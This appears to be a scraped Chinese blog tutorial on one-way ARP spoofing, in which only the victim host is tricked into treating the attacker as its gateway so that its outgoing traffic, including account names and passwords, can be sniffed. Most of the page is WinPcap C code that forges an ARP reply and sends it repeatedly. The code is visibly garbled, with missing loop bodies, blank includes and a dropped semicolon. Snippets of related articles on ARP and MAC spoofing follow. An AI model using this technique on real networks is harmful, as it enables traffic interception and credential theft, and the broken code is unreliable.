再談利用ARP欺騙實現嗅探

2021-04-06 20:24:31 字數 2542 閱讀 7136

再談利用arp欺騙實現嗅探

設有主機a、b、c在同乙個區域網中,且閘道器為g。a,c為要監聽的主機,b為我們的機器。目前的大多數工具的實現是欺騙a和與a通訊的主機c對方的mac均為b,這樣就可以監聽它們的通訊。但是實際上大多數情況下,我們感興趣的是a與閘道器g的通訊,而其中又尤其對a發出的一些資訊感興趣,譬如賬號、密碼,至於g又向a傳送了什麼資料,我們不太關心。

那麼在這種情況下,就沒有必要欺騙閘道器g(告訴g,a的mac為b)。只欺騙a主機,告訴它閘道器g的mac為b。這樣a,g之間的通訊就成了這個樣子:

a------->b------>g

a<----------------g

很明顯,若a收發的資料相當,那麼經過b的資料量幾乎少了一半,當然也就節省了網路頻寬和b主機的負擔。

下面給出在xp+vc6.0平台且被欺騙主機也為xp時用winpcap實現的**(本機需開ip路由功能):

#include

#include

#pragma comment(lib,"wpcap")

int main(int argc, char **argv)

/* print the list */

for(d=alldevs; d; d=d->next)

if(i==0)

printf("enter the inte***ce number (1-%d):",i);

scanf("%d", &inum);

if(inum < 1 || inum > i)

/* jump to the selected adapter */

for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);

/* open the output adapter */

if((fp = pcap_open_live(d->name, 60, 1, 1000, error) ) == null)

pcap_freealldevs(alldevs);

/* mac of target you want to spoof */

packet[0]=0x00;

packet[1]=0x00;

packet[2]=0x00;

packet[3]=0x00;

packet[4]=0x00;

packet[5]=0x00;

/* mac of your host */

packet[6]=0x00;

packet[7]=0x00;

packet[8]=0x00;

packet[9]=0x00;

packet[10]=0x00;

packet[11]=0x00;

/* set the protocol type */

packet[12]=8;

packet[13]=6;

/* set the hard and protocol type */

packet[14]=0;

packet[15]=1;

packet[16]=8;

packet[17]=0;

/* set the length */

packet[18]=6;

packet[19]=4;    

/* set the operation type */

packet[20]=0;

packet[21]=2;

/* mac of your host */

packet[22]=0x00;

packet[23]=0x00;

packet[24]=0x00;

packet[25]=0x00;

packet[26]=0x00;

packet[27]=0x00;

/* ip of the gateway */

packet[28]=0;

packet[29]=0;

packet[30]=0;

packet[31]=0;

/* mac of the target you want to spoof */

packet[32]=0x00;

packet[33]=0x00;

packet[34]=0x00;

packet[35]=0x00;

packet[36]=0x00;

packet[37]=0x00;

/* ip of the target you want to spoof */

packet[38]=0

packet[39]=0;

packet[40]=0;

packet[41]=0;

/* fill the rest of the packet */

for(i=42;i<60;i++)

/* send down the packet */

while(1)

return 0;}附:

對於怎樣實現arp欺騙,很可能不同的網路沒有一定的法則可循。我用的是xpsp1專業版,對於arp reply若傳送端不是閘道器則ip不更新arp快取,而該程式正好是閘道器的ip。

嗅探 欺騙 ARP欺騙

二 kali上實現arp欺騙 三 防範arp欺騙 arp欺騙 arp spoofing 又稱arp毒化或arp攻擊。它是針對乙太網位址解析協議 arp 的一種攻擊技術。通過欺 域網內訪問者的閘道器mac位址,使訪問者錯以為攻擊者更改後的mac位址是閘道器的mac,導致應當發往閘道器地資料報傳送到攻擊...

無ARP欺騙嗅探技術

文 圖 劉志生 arp欺騙的攻擊和防禦技術都比較成熟了,雜誌以前的文章也介紹得比較詳細,這裡就不再細述了。本文重點講解如何不使用arp欺騙進行嗅探以及會話劫持的技術原理,實際的攻擊方法是進行mac欺騙。原理說明 在開始之前,我們先簡單了解一下 交換機的 過程。交換機的乙個埠接收到乙個資料幀時,首先檢...

無ARP欺騙的嗅探技術

arp欺騙的攻擊和防禦技術都比較成熟了,這裡也不再闡述。此次重點講解如何不用arp欺騙進行嗅探以及會話劫持的技術原理,實際的攻擊方法是進行mac欺騙。一 原理 在開始之前我們先簡單了解一下交換機 過程 交換機的乙個埠收到乙個資料幀時,首先檢查改資料幀的目的mac位址在mac位址表 cam 對應的埠,...